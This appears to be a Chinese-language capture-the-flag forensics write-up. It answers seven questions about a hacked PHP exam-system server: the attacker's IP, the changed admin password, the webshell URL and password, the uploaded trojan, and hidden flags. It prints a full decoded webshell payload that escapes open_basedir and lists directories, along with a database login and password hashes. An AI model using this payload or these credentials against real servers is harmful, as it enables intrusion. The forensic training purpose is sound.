# 题目 1

通过本地 PC SSH 到服务器并且分析黑客的 IP 为多少,将黑客 IP 作为 FLAG 提交;

[root@ip-10-0-10-2 ~]# cat /www/wwwlogs/access.log | cut -d" " -f1 | sort | uniq -c

flag: flag{}

# 题目 2

通过本地 PC SSH 到服务器并且分析黑客修改的管理员密码 (明文) 为多少,将黑客修改的管理员密码 (明文) 作为 FLAG 提交;


[root@ip-10-0-10-2 ~]# cat /www/wwwroot/ 
/** 数据库设置 */
[root@ip-10-0-10-2 ~]# mysql -h -u kaoshi -p5Sx8mK5ieyLPb84m
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 9
Server version: 5.7.44-log Source distribution
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use kaoshi;
Database changed
mysql> show tables;
| Tables_in_kaoshi    |
| x2_answer           |
| x2_app              |
| x2_area             |
| x2_ask              |
| x2_attach           |
| x2_attachtype       |
| x2_basic            |
| x2_block            |
| x2_category         |
| x2_cequeue          |
| x2_certificate      |
| x2_city             |
| x2_cityarea         |
| x2_cnttouser        |
| x2_comment          |
| x2_config           |
| x2_consumelog       |
| x2_content          |
| x2_coupon           |
| x2_course           |
| x2_coursesubject    |
| x2_docfloder        |
| x2_dochistory       |
| x2_docs             |
| x2_examhistory      |
| x2_exams            |
| x2_examsession      |
| x2_exercise         |
| x2_favor            |
| x2_feedback         |
| x2_knows            |
| x2_log              |
| x2_module           |
| x2_module_fields    |
| x2_navs             |
| x2_openbasics       |
| x2_opencourse       |
| x2_orders           |
| x2_poscontent       |
| x2_position         |
| x2_progress         |
| x2_province         |
| x2_quest2knows      |
| x2_questionanalysis |
| x2_questionrows     |
| x2_questions        |
| x2_questype         |
| x2_record           |
| x2_recorddata       |
| x2_reply            |
| x2_sections         |
| x2_seminar          |
| x2_seminar_content  |
| x2_seminar_elem     |
| x2_seminar_layout   |
| x2_seminar_tpls     |
| x2_session          |
| x2_subject          |
| x2_user             |
| x2_user_group       |
| x2_wxlogin          |
61 rows in set (0.00 sec)
mysql> select * from x2_user_group;
| groupid | groupname    | groupmoduleid | groupdescribe | groupright | groupmoduledefault | groupdefault |
|       1 | 管理员       |             1 | 管理员        |            |                  1 |            0 |
|       8 | 普通用户     |             9 | 普通用户      |            |                  0 |            1 |
|       9 | 教师         |            12 | 教师          |            |                  0 |            0 |
3 rows in set (0.04 sec)
mysql> select * from x2_user;
| userid | useropenid | userunionid | username        | useremail      | userpassword                     | usercoin | userregip      | userregtime | userlogtime | userverifytime | usergroupid | usermoduleid | useranswer | manager_apps                                                                                                                 | usertruename       | normal_favor | teacher_subjects                                                                                                                                                                             | userprofile | usergender | userphone | useraddress | userphoto                                               | userstatus | normal_sfz |
|      1 |            | NULL        | peadmin         | 958074@163.com | f6f6eb5ace977d7e114377cc7098b7e3 |      279 |      |  1471795200 |           0 |           NULL |           1 |            0 | NULL       | a:7:{i:0;s:4:"user";i:1;s:7:"content";i:2;s:4:"exam";i:3;s:8:"document";i:4;s:6:"course";i:5;s:4:"bank";i:6;s:8:"autoform";} | 111111111111111111 |              |                                                                                                                                                                                              |             ||           | 信息部      | files/attach/images/content/20230802/16909740072788.jpg |          3 |            |
|      2 |            | NULL        | 教师管理员      | 958074@126.com | 96e79218965eb72c92a549dd5a330112 |       98 |      |  1471795200 |           0 |           NULL |           9 |            0 | NULL       |                                                                                                                              | 213123             |              | a:14:{i:0;s:2:"13";i:1;s:2:"12";i:2;s:1:"5";i:3;s:1:"4";i:4;s:1:"3";i:5;s:1:"1";i:6;s:1:"2";i:7;s:2:"17";i:8;s:2:"15";i:9;s:2:"16";i:10;s:2:"18";i:11;s:2:"19";i:12;s:2:"20";i:13;s:2:"21";} | 77777       |            |           |             |                                                         |          3 |            |
|      3 |            |             | zgsf            | [email protected] | af0c68603004a1b5af4d87a71a813057 |        0 | |  1709795218 |           0 |              0 |           8 |            0 |            |                                                                                                                              |                    |              |                                                                                                                                                                                              |             |            |           |             |                                                         |          0 |            |
|      4 |            |             | zgsfAdmin       | [email protected]  | ed2b3e3ce2425550d8bfdea8b80cc89a |        0 | |  1709796233 |           0 |              0 |           8 |            0 |            |                                                                                                                              |                    |              |                                                                                                                                                                                              |             |            |           |             |                                                         |          0 |            |
4 rows in set (0.00 sec)

pedadmin 是管理员,因为用户 ID 是 1

MD5 f6f6eb5ace977d7e114377cc7098b7e3 解开为: Network@2020

flag: flag{Network@2020}

# 题目 3

通过本地 PC SSH 到服务器并且分析黑客第一次 Webshell 的连接 URL 为多少,将黑客第一次 Webshell 的连接 URL 作为 FLAG 提交 (无需域名 flag {xxx.php?abc-app-upload});


看到有 pcap 流量包下载下来 wireshark 看一眼

http 过滤后一看吓一跳



flag: flag{index.php?user-app-register}

# 题目 4

通过本地 PC SSH 到服务器并且分析黑客 Webshell 连接密码多少,将黑客 Webshell 连接密码 作为 FLAG 提交;

把流量 URL 解码一下

Network2020=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.effe42";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "37de"."699c";echo @asenc($output);echo "e28ef"."b7f3d";}ob_start();try{$D=base64_decode(substr($_POST["x0b6b31b98f31d"],2));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="	".$T."	".@filesize($P)."	".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&x0b6b31b98f31d=fEL3d3dy93d3dyb290LzEyNy4wLjAuMS8=

flag: flag{Network2020}

# 题目 5

通过本地 PC SSH 到服务器并且分析黑客使用的后续上传的木马文件名称为多少,将黑客使用的后续上传的木马文件名称 作为 FLAG 提交;

看了一下 history

50  ls
51  rm -rf flag1 1
52  ls
53  rm -rf version2.php 
54  ls
55  hardlink 
56  hwclock 
57  ls
58  docker ps
59  rm -rf pe9.sql

试了一下 flag1,不行

流量里有 version2.php,试了可以

flag: flag{verison2.php}

# 题目 6

通过本地 PC SSH 到服务器并且分析黑客隐藏的 flag2, 将黑客使隐藏的 flag2 作为 FLAG 提交;

看了一下 history,发现了修改了文件

89  ls
90  cd .api/
91  ls
92  vim mpnotify.php 
93  yum install vim
94  ls
95  vim  alinotify.php
[root@ip-10-0-10-2 ~]# cat -n /www/wwwroot/
55  include PEPATH.'/lib/init.cls.php';
56  $app = new app(new ginkgo);
57  $app->run();
58  $flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}";

flag: flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

# 题目 7

通过本地 PC SSH 到服务器并且分析黑客隐藏的 flag3, 将黑客使隐藏的 flag3 作为 FLAG 提交;

看了一下 history,发现 flag3

102  $flag3 = [root@web-server .api]# useradd flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
103  useradd: invalid user name 'flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}'
104  $flag3 = flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

flag: flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}